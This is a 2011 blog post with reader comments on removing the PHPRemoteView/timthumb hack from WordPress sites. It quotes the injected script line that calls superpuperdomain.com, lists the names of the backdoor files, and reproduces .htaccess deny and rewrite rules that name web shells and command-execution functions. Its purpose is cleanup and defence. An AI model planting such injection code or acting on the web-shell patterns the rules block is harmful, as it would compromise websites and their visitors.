PHPRemoteView Hack: What it is, and how to remove it

Aug 7, 2011 by

PHPRemoteView
(image courtesy tbogard.com)

What is the PHPRemoteView hack? The PHPRemoteView hack is a WordPress hack initiated by hackers gaining write access to your WordPress directory. I myself did not take an image of it, but was dumb enough to fall for it. What it did was it would show an HTTP authentication-like alert upon launching the WordPress administration directory and entering your username and password would show a message linking to a page in another language.

Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.

I learned that this hack was caused by a security vulnerability in timthumb.php (a thumbnail fetching script) and I was susceptible because I did not update my timthumb.php.

I scoured the Internet and finally found a fix.

First, in your WordPress’s index.php, remove the following script added by the hack:

echo '<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

(Note that the script could also be run from superpuperdomain2.com.)

Then remove six (check back often) phony files added by the hackers (back up first, in case your installation actually requires these files):

/wp-admin/js/config.php
/wp-admin/common.php
/wp-admin/udp.php
/wp-content/udp.php
/wp-content/uploads/feed-file.php
/wp-content/uploads/feed-files.php

Do not try to open any of these files, as my antivirus sounded alarms immediately.

I learned my lesson, and upon purging TechSpheria of this hack, I changed about twenty passwords.

To increase your site’s security, make sure you have correct permissions for files and directories.

Folder permissions for all of my WordPress installations are 755 whereas file permissions are 644.

Run this bash command to set the correct permissions recursively for your WordPress installation:

chmod -R 0755 /wordpressdirectory

I also added this rule in my .htaccess (in my account’s root folder, not inside public_html):

order allow,deny
deny from 91.220
deny from 91.196
deny from superpuperdomain.com
deny from superpuperdomain2.com
allow from all

The malicious script was run from superpuperdomain.com (UPDATE: superpuperdomain2.com has popped up) and I had run a traceroute on the domains, and found its servers’ IP addresses. To be safe, I blocked all the IPs in their range (91.220 and 91.196) and they would receive a forbidden notice if they tried to access TechSpheria again.

Benoist Rousseau posted additional .htaccess security; use at your own risk:

RewriteCond %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
RewriteCond %{QUERY_STRING} ^(.*)=/home/(.*)$ [OR]
RewriteCond %{QUERY_STRING} ^work_dir=.*$ [OR]
RewriteCond %{QUERY_STRING} ^command=.*&output.*$ [OR]
RewriteCond %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)cmd=.*$ [OR] ## ATTENTION A CETTE REGLE. ELLE PEUT CASSER VOTRE SITE ##
RewriteCond %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
RewriteCond %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|massbrowsersploit|exploits|grablogins|upload.*)|((chmod|f)&f=.*))$ [OR]
RewriteCond %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|update|feedback|cmd|gofile|mkfile)&d=.*$ [OR]
RewriteCond %{QUERY_STRING} ^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree&d|t&d=|e&d=|i&d=|codes|md5crack).*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmdir|pwd|clear|whoami|uname|tar|zip|unzip|tar|gzip|gunzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail|which|mkmode|touch|logname|edit_file|search_text|find_text|php_eval|download_file|ftp_file_down|ftp_file_up|ftp_brute|mail_file|mysql|mysql_dump|db_query)([^a-zA-Z0-9].+)*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$
RewriteRule (.*) – [F]

Remember to keep your plugins and code updated, and use different passwords for all your sites; keeping a secure WordPress installation is vital to everything.

(via T. Bogard and Benoist Rousseau)

UPDATE 1:
Added /wp-content/udp.php to the list of malicious files.

UPDATE 2:
/wp-content/udp.php can also be located in /wp-admin/udp.php. Check both /wp-content/ and /wp-admin/ for udp.php.

UPDATE 3:
Both /wp-content/udp.php and /wp-admin/udp.php are present and malicious. Remove them both.

UPDATE 4:
Added two files: /wp-content/uploads/feed-file.php and /wp-content/uploads/feed-files.php to the list.

UPDATE 5:
Added 91.196 to the deny IP list since superpuperdomain2.com has popped up.

  • bill ballad

    I had the same thing hit my site yesterday, you may have missed a file look for udp.php in wp-content its a remote file upload script

    • http://techspheria.com Dennis Fan

      Yes, thanks. I was unaware of its presence.

      And I was hit by it yesterday as well, only got around to writing about it today.
      —– Reply message —–

    • http://techspheria.com Dennis Fan

      Do you know if they collect usernames and passwords sent through their script?
      —– Reply message —–

      • debajyoti banerjee

        Better to change your mySQL database password and all other associated passwords. I have faced similar phpRemoteview attack while using “IGIT related post with thumb image after post” plugin which uses old ‘timthumb.php’ file vulnerable to this attack. 

        • http://techspheria.com Dennis Fan

          Thank you. I already changed most of my significant passwords.

        • http://www.facebook.com/profile.php?id=1134455829 Andrew Wells Douglass

          I’m thinking IGIT is the culprit, too. Sent a note to the author. Version 3.9.7

          Any suggestions for alternative plugins? :)

      • bill ballad

        Looks like thsi was just phase one, right now i think they are just collecting attack metrics, phase two will bring exploit packages if you didn’t clean your site. I think phase one was an automated worm.

        • http://techspheria.com Dennis Fan

          Thank you for sharing your thoughts. Mind if I include that in the article later? (with credit, of course)

  • Pingback: Ci hanno infettato il sito! | La Baia

  • Pingback: Wordpress Website Hacked with RemoteViewPHP

  • http://twitter.com/dirk_s dirk_s

    udp.php is also changed / added in /wp-admin/

    • http://techspheria.com Dennis Fan

      Thank you for that information. I will update the post now.

  • http://twitter.com/dirk_s dirk_s

    Quadro is a theme, that uses the timthumb.php …

  • Pingback: How to Check for PHP Remote View Hack | Empirical Integrated Marketing

  • Paul

    Thank you so much for the comprehensive fix. Do we need to remove timthumb.php? Is there an update available?

    • http://techspheria.com Dennis Fan

      Yes, there is an update available, no need to remove it.

      Sent from my HTC

      —– Reply message —–

  • Tina

    You’ve saved my life – thank you so much!

  • http://www.platformnation.com Steve519

    There were also two files that were uploaded to the upload folder.  I forgot the names but they had either feed or rss in the title.  Both within an hour of the other files being uploaded.

    • http://techspheria.com Dennis Fan

      /wp-content/feed-file.php and /wp-content/feed-files.php. Thank you. Added to the list, much appreciated!

  • http://twitter.com/beaubrk Beau Brooke

    I believe my site is infected by this too. I’ve checked my index.php but I dont have the script above. I did however have some of the additional malicious files. Where should I be looking?

    I have updated my timthumb.php and removed what I can but I need to make sure it’s 100% removed.

  • http://twitter.com/beaubrk Beau Brooke

    Ignore me, I assumed this guide meant the index.php within the theme folder. I’ve found it now.

  • Tina

    I just found yet another file wp-content/78d69f40906679a976dc4d45cebffbe6.php

  • Pingback: Removing PHPRemoteView hack attack from your Wordpress

  • http://pulse.yahoo.com/_LASIK3PT7Z4QXQGTN4G4GZ3QYY Nayith

    Question! I Had wp-admin/upd.php instead of udp.php I delete it, was this incorrect?

    • http://techspheria.com Dennis Fan

      I’m sorry, I’m not understanding what you’re saying.

      Sent from my HTC

      —– Reply message —–

      • http://pulse.yahoo.com/_LASIK3PT7Z4QXQGTN4G4GZ3QYY Nayith

        In my directory, I was not able to find (as mentioned above)

        /wp-admin/udp.php

        /wp-content/udp.php

        Instead, they were called /wp-admin/UPD.php (The difference is just the letters order). Do you think it will affect my website?

        • http://techspheria.com Dennis Fan

          Check the contents of the file. I doubt its legitimacy, however, make sure. If there are no comments indicating WordPress or a plugin, it’s probably malicious.

          • http://pulse.yahoo.com/_LASIK3PT7Z4QXQGTN4G4GZ3QYY Nayith

            Thanks A lot for your help, really appreciated!!

          • http://pulse.yahoo.com/_LASIK3PT7Z4QXQGTN4G4GZ3QYY Nayith

            As you said, they are illegitimate!

  • Admin

    there’s also a temp direcetory inside your theme template delete that as well

  • http://donotargue.com KillerSneak

    Sorry for the double post, the temp directory also hosts an altered .htaccess and the 78d69f40906679a976dc4d45cebffbe6.php numeric php files along with some fake index and other files just delete the whole temp directory/folder

  • http://twitter.com/rachelhonoway rachelhonoway

    Thanks for the help – MUCH appreciated! (BTW – We use the magnificent theme as well)

  • http://windsorite.ca Owen Christopher Wolter

    THANKS so much for this.  windsorite.ca became infected, I don’t know when the last time was that I updated timthumb

    Also, a recent ping of superpuperdomain2.com returns 91.196.XXX.XXX

    So in my htaccess I now have:

    order allow,deny
    deny from 91.220
    deny from 91.196
    deny from superpuperdomain2.com
    allow from all

  • carley

    Another big thankyou for the post! Damn hackers!

  • Zack Proser

    Much appreciated!

  • Pingback: phpRemoteView Attack: Vulnerabilità in WordPress

  • http://www.epicinfo.net Matt C

    Awesome post. Just saved my ass. Thank you.

  • Adamfrm

    thank you very much for this useful article I also have received such a problem and I’ve run the appropriate command above article, but I do not find the file: / wp-content/uploads/feed-file.php / wp-content/uploads/feed-files.php if you can help me?

    • http://techspheria.com Dennis Fan

      If those files are not there, you SHOULD be fine.

    • Anonymous

      I had the same issue with this hack, but thanks to this post I saved my websites. Adamfrm I couldn’t find /feed-files.php and /feed-file.php either, but when I checked my sites on http://sitecheck.sucuri.net/scanner/ it didn’t showed me that the sites were infected. Cause before that I had checked them and it had shown me that my sites had been infected.

  • Nwill36

    Very useful information, 1 of my sites had been hacked, also got through crawltrack,
    Thanks for your quick help I have secured other sites using wordpress

  • http://lloydchiro.com LloydChiro

    Thanks for this. I had SOME of those files in my site, but not all. 

    I’m wondering if I need to wipe my site on my host and start clean, or will this be a permanent fix?

    • http://techspheria.com Dennis Fan

      You SHOULD be fine.

      Sent from my HTC

      —– Reply message —–

  • http://lloydchiro.com LloydChiro

    Oh, and I can’t figure out how I got this. Anybody know how this shows up?

    • http://techspheria.com Dennis Fan

      timthumb.php had a security exploit and that was used to infect your site.
      Sent from my HTC

      —– Reply message —–

      • http://lloydchiro.com LloydChiro

        Thanks. I actually just updated my tomthumb.php file. The theme that I’m using is using version 1.4, and the latest version is up to 2.7. I would have never thought to update this on my own, as it’s not a plugin that I see on my dashboard. 

  • Chris Miller

    Thanks for your help with this! Saved a site for us tonight! 

  • http://www.facebook.com/profile.php?id=1134455829 Andrew Wells Douglass

    I should have also said THANK YOU THANK YOU THANK YOU for a timely and lucid explanation of this problem. I suspect others are more grateful than it might seem. It’s like, if your doctor tells you that you have cancer, your first instinct may not be to send her a fruit basket….

  • Pre_existance

    THANK YOU SO MUCH FOR THIS….i’ve spent all day trying to figure this out and wasn’t understanding anything i was reading on other sites. This made perfect sense and actually WORKED!!! hoorah!!

  • Pingback: Seu wordpress pode estar sendo hackeado pelo Superuperdomain: TimThumb e PHP Remote View Hack | [ Ferramentas Blog ]

  • Pingback: eBabble - Technology » TimThumb Vulnerability

  • Lauro Faria

    Apart from these files, also found: / wp-content/e334….php / wp-config.php / index.php Who had injected code.Lauro Fariawww.bdibbs.com.br

  • OceansDB

    My blog got hacked too. I filed a complaint at superpuperdomain.com’s registrar with some additional information and a virus report. I am very pleased to let y’all know the domain has been suspended :)

  • Pingback: Falha de segurança no Timthumb - BDI BBS

  • http://twitter.com/minimalis Seb

    Hi,

    thanks for this great post. I got hacked by this crap as well. I deleted the files you mentioned above but I can’t finde “the base code”.

    First, in your WordPress’s index.php, remove the following script added by the hack:echo ”;I can’t find this on my index.php. Do you have another idea?Regards

    • http://techspheria.com Dennis Fan

      Does your index.php look like a normal WordPress index?

      • http://twitter.com/minimalis Seb

        That is how it looks like http://dl.dropbox.com/u/1849289/index.php

        But if I check the sourcecode at http://willius-photography.de I can see the script.

        • http://techspheria.com Dennis Fan

          Clear any caching plugin you might have installed.

          • http://twitter.com/minimalis Seb

            Don’t have a caching plugin installed :-/

            • http://techspheria.com Dennis Fan

              Oh… Check the blog header file then? Maybe the hackers have evolved…

              • http://twitter.com/minimalis Seb

                Thanks a bunch for your quick answers, Dennis. I searched index.php, header and footer for “superpuperdomain” but I can’t find anything. It’s weird.

                • http://techspheria.com Dennis Fan

                  Try clearing your cache?

                  • http://twitter.com/minimalis Seb

                    Done. Still in the sourcecode. 

                    “”

                • http://techspheria.com Dennis Fan

                  *Your browser cache.

        • http://techspheria.com Dennis Fan

          Hello, I just checked your site’s source and did not manage to find superpuperdomain…

          • http://twitter.com/minimalis Seb

            Chrome shows it and a huge malware warning pops up if you try to reach the site :-/

            • http://techspheria.com Dennis Fan

              I have no idea what could be causing this, I suggest you wait for a day, and see if it is still there. If so, there are more extreme ways of fixing this.

  • Pingback: Malware Attacke Superpuperdomain2.com | FOTOPRESSO

  • Beej

    I have the same thing as seb..my site’s source code: newyoungelite.com has this  on line 669. I dont know how to change it.

    • beej

      fixed

      • Robbie

        how did you fix it?

  • Pingback: Webseite gehackt. Kontrolliert eure Wordpress Installation. : swblog

  • http://www.pixel2pixeldesign.com Pixel2Pixel Design

    Refer this article it is a good one to remove this virus http://www.pixel2pixeldesign.com/phpremoteview-hack-superpuperdomaincom-remove/

  • Blaise

    thanks. Really. You save my blog

  • http://gaut.am/ Gautam

    I’ve removed the code from wp-config.php and also deleted the upd.php file from wp-content. But still, when I browse any site, it seems to crash the whole server. I have 4 WP sites running under 3 users on a Dreamhsot VPS – I’ve cleaned them all against codes, timthumb (it is there on one site, but that is the latest version with allow external deactivated), files etc. and also added the htaccess codes (both of those in the same file, above the domain directory).

  • http://donotargue.com KillerSneak

    Anybody having issues with “counter-wordpress.com” my site has been flagged by Chrome now and it leads to the same:
    Welcome to nginx! that the timthumb hack had? Can someone help me as I can’t find where it’s coming from

  • Pingback: Hacked And Had | Micah

  • JustMe

    I cleared one of my site’s from this hack, but now my other site got hacked too. Not by superpuperdomain.com but touchtrip.ru….

    It seems to be a lot more difficult to resolve :-(

    Anyone else got probs with downloading plugins through the backend? Like, get redirected to google, or the malware message from google?
    Could you please check this out techspheria? Maybe you will find a solution, before all the wordpress installations got this issue….

  • JustMe

    Found it, my .htacces file had a few hidden lines that linked to http:*//distributioncorporate*.ru/kloac/index.phpDeleted my .htaccess file and maked a new one.These hackers also place phony files in your wordpress installation. Check your uploads directory and theme files for sm3.php and other files you don’t reconize.

  • Pingback: Drabbad av Pharma Hack… @ Who Cut The Cheeze

  • Deirdorf

    Thanks for the help!!! 

    I would have found this post sooner if it had shown up in initial search for “Exploit:JS/Timbum.B” 

    It would help if you added Exploit:JS/Timbum.B since that is how the is malware is referenced.  

  • http://www.justinwheeler.net Justin Wheeler

    Thanks very much!